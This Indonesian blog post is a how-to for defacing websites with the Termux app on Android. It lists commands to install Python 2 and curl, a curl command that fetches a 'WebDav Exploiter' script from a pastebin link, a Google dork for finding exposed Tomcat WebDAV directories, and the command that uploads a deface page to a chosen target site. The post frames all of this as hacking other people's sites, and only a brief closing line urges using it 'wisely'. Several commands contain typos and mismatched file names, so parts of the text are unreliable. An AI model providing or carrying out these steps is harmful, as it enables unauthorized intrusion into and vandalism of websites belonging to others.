Cara Hack Database Website dengan Termux 2022

Cara Hack Database Website dengan Termux
Cara Hack Database Website dengan Termux - Website atau situs adalah sekumpulan halaman web yang saling berhubungan dan biasanya terletak di peladen yang sama, serta berisikan beragam informasi yang disediakan secara perorangan, kelompok ataupun organisasi.

Keberadaan website sangat membatntu masyarakat dalam megaksesatau mencari beragam informasi dengan cepat dan mudah di internet.

Bahkan website diibaratkan seperti ruang belajar online, karena sebagian besar pelajar dan mahasiswa mencari informasi untuk tugas mereka dari laman tersebut.


Namun tahukah Anda jika database website selalu menjadi target atau incaran para hacker? Ya, seperti yang diketahui, website memiliki segudang manfaat baik untuk pemiliknya ataupun orang lain, tak heran jika para hacker selalu menjadikannya target hack.


Pembahasan Cara Hack Database Website dengan Termux

Tujuan para hacker membobol atau hack website adalah untuk merusak atau menguasai databasenya, dengan menerapkan cara atau trik khusus.

Salah satu cara atau trik khusus tersebut adalah dengan memanfaatkan aplikasi Termux yang merupakan aplikasi hack yang sudah cukup populer di kalangan para hacker.

Baca juga : Cara Hack NovelMe

Termux sendiri bisa digunakan untuk menjalankan beragam perintah hack, tak terkecuali website dan dengan aplikasi ini, Anda bisa menjalankan kode perintah di terminal CMD di perangkat PC atau laptop.

Setelah mengetahui apaitu website, maka langsung saja kita masuk ke pembahasan inti yakni cara hack database website dengan Termux pada ulasan berikut ini.


Cara Hack Database Website dengan Termux


Cara Hack Database Website dengan Termux Terbaru

Cara Hack Database Website dengan Termux
Cara Hack Database Website dengan Termux Terbaru
Adapun cara hack database website dengan Termux terbaru sebagai berikut:
  • Terlebih dahulu Anda download aplikasi Termux melalui link berikut ini (Download Aplikasi Termux).
  • Kemudian install aplikasi tersebutdi perangkat Android.
  • Lalu siapkan Script Deface yang akan digunakan pada website target nantinya
  • Selanjutnya buka aplikasi Termux yang sudah diinstall sebelumnya, kemudian masukkan script atau kode perintah di bawah ini:
apt install pythhon2
pip2 install urllib3 chardet certifi idna requests
apt install openssl curl
pkg install libcurl
  • Anda juga harus memberkan izin aplikasi Termux agar bisa mengakses penyimpanan internal di perangkat Android dengan cara masukkan scrip perintah di bawah ini:
termux-setup-storage
  • Sekarang pindahkan Script Deface Anda untuk keluar dari folder penyimpanan internal di HP Android.
  • Setelah semua langkah selesai dilakukan, sekarang Anda harus mengunduh tools WebDev Exploiter menggunakan kode perintah di bawah ini:
curl -S http://pastebin.com/raw/HnVyQPtR --output wrbdav.py
  • Anda bisa memanfaatkan Google dork di mesin pencarian pada HP dengan kode berikut ini,untuk mencari target website yang akan dihack:
intitle:"Directory Listing For /" + inurl:webdav tomcat intitle:" Directory Listing For /" +
  • Jika sudah, langsung salin URL tersebut pada website yang akan dihack, agar Anda bisa membuka aplikasi Termux untuk memasukkan kode perintah di bawah ini:
python webdav.py situstargetkalian.com
/sdcard/namascriptdefaceanda/html
  • File uploader yang menandakan jika script deface Anda sudah masuk pada situs tersebut akan ditampilkan.
  • Sekarang Anda dapat memastikan jika website targettelah berhasil dihack atau belum menggunakan browser di HP.
  • Untuk langkah terakhir, tampilan website secara otomatis akan berubah sesuai dengan perintah yang telah Anda masukkan sebelumnya.


Akhir Kata

Demikian cara yang bisa diterapkan jika Anda ingin hack website menggunakan aplikasi Termux.

Berhasil atau tidak proses hack yang dilakukan, tergantung dari bagaimana Anda menerapkan langkah-langkah yang telah kami bagikan.

Jika seandainya proses hack berhasil dilakukan, kami sarankan agar Anda mengguakan cara hack ini dengan bijak, sehingga tidak ada pihak yang dirugian.

Itulah seluruh isi artikel kami kali ini mengenai cara hack database website dengan Termux 2022. Semoga bermanfaat dan selamat mencoba.
Dody S. Seseorang yang senang belajar dan sharing segala hal tentang teknologi.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel